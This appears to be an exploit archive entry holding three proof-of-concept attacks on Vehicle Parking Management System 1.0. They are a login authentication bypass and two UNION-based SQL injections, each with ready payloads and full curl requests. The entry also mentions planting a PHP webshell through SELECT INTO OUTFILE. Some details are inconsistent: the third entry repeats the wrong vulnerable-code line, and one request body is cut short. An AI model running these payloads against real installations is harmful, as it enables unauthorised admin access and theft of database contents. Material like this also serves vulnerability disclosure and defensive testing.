id: 34693
date: 07/17/2020
title: Vehicle Parking Management System 1.0 SQL Injection Vulnerability
author: gh1mau
cves: 

# Exploit Title: Vehicle Parking Management System 1.0 - Authentication Bypass
# Exploit Author: gh1mau
# Team Members: Capt'N,muzzo,chaos689 | https://h0fclanmalaysia.wordpress.com/
# Vendor Homepage: https://phpgurukul.com/vehicle-parking-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10331
# Version: V1.0
# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)


Vulnerable File:
---------------- 
/index.php


Vulnerable Code:
-----------------
line 8: $adminuser=$_POST['username'];

Vulnerable Issue:
-----------------
$adminuser=$_POST['username']; is not filtered correcty


POC:
----

URL: http://localhost/vpms/index.php
Username : ' or '1'='1'#
Password : anything


Sample Request:

curl -i -s -k --location --request POST 'http://localhost:80/vpms/index.php' \
--header 'Origin: http://localhost:88' \
--header 'Cookie: PHPSESSID=iu0nt7at7e16a06djdcoo49n73' \
--header 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' \
--header 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0' \
--header 'Connection: close' \
--header 'Referer: http://localhost:88/vpms/index.php' \
--header 'Host: localhost:88' \
--header 'Accept-Encoding: gzip, deflate' \
--header 'Upgrade-Insecure-Requests: 1' \
--header 'Accept-Language: en-US,en;q=0.5' \
--header 'Content-Length: 61' \
--header 'Content-Type: application/x-www-form-urlencoded' \
--data-raw 'username=%27+or+%271%27%3D%271%27%23&password=anything&login='


------------------

# Exploit Title: Vehicle Parking Management System 1.0 - 'searchdata' SQL Injection
# Date: 2020-07-16
# Exploit Author: gh1mau
# Team Members: Capt'N,muzzo,chaos689 | https://h0fclanmalaysia.wordpress.com/
# Vendor Homepage: https://phpgurukul.com/vehicle-parking-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10331
# Version: V1.0
# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)


Vulnerable File:
---------------- 
\search-vehicle.php


Vulnerable Code:
-----------------
line 102: $sdata=$_POST['searchdata'];

Vulnerable Issue:
-----------------
$sdata=$_POST['searchdata']; is not filtered correcty

[+] Any authenticated user/client can inject the following payload inside the Search Invoice Form
[+] Attacker can inject php webshell using SELECT INTO OUTFILE method through this entry point


POC:
----

Payload:

gh1mau' UNION ALL SELECT CONCAT_WS(0x3a,version(),database(),user()),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -


Sample Request:

curl -i -s -k --location --request POST 'http://localhost/vpms/search-vehicle.php' \
--header 'Origin: http://localhost:88' \
--header 'Cookie: PHPSESSID=iu0nt7at7e16a06djdcoo49n73' \
--header 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' \
--header 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0' \
--header 'Connection: close' \
--header 'Referer: http://localhost:88/vpms/search-vehicle.php' \
--header 'Host: localhost:88' \
--header 'Accept-Encoding: gzip, deflate' \
--header 'Upgrade-Insecure-Requests: 1' \
--header 'Accept-Language: en-US,en;q=0.5' \
--header 'Content-Length: 418' \
--header 'Content-Type: multipart/form-data; boundary=---------------------------220471253135662998802530835126' \
--data-raw '-----------------------------220471253135662998802530835126
Content-Disposition: form-data; name="searchdata"'

------------------

# Exploit Title: Vehicle Parking Management System 1.0 - 'vid' SQL Injection
# Date: 2020-07-16
# Exploit Author: gh1mau
# Team Members: Capt'N,muzzo,chaos689 | https://h0fclanmalaysia.wordpress.com/
# Vendor Homepage: https://phpgurukul.com/vehicle-parking-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10331
# Version: V1.0
# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)


Vulnerable File:
---------------- 
\print.php


Vulnerable Code:
-----------------
line 20: $cid=$_GET['vid'];

Vulnerable Issue:
-----------------
$sdata=$_POST['searchdata']; is not filtered correcty

[+] Any authenticated user/client can inject the following payload inside the Search Invoice Form
[+] Attacker can inject php webshell using SELECT INTO OUTFILE method through this entry point


POC:
----

Payload:

gh1mau' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT_WS(0x3a,version(),database(),user()),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

http://localhost/vpms/print.php?vid=gh1mau%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT_WS(0x3a,version(),database(),user()),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-


Sample Request:

curl -i -s -k --location --request GET 'http://localhost/vpms/print.php?vid=gh1mau%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT_WS(0x3a,version(),database(),user()),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-' \
--header 'Cookie: PHPSESSID=iu0nt7at7e16a06djdcoo49n73' \
--header 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' \
--header 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0' \
--header 'Connection: close' \
--header 'Host: localhost:88' \
--header 'Accept-Encoding: gzip, deflate' \
--header 'Upgrade-Insecure-Requests: 1' \
--header 'Accept-Language: en-US,en;q=0.5' \
--data-raw ''

#  0day.today [2023-03-26]  #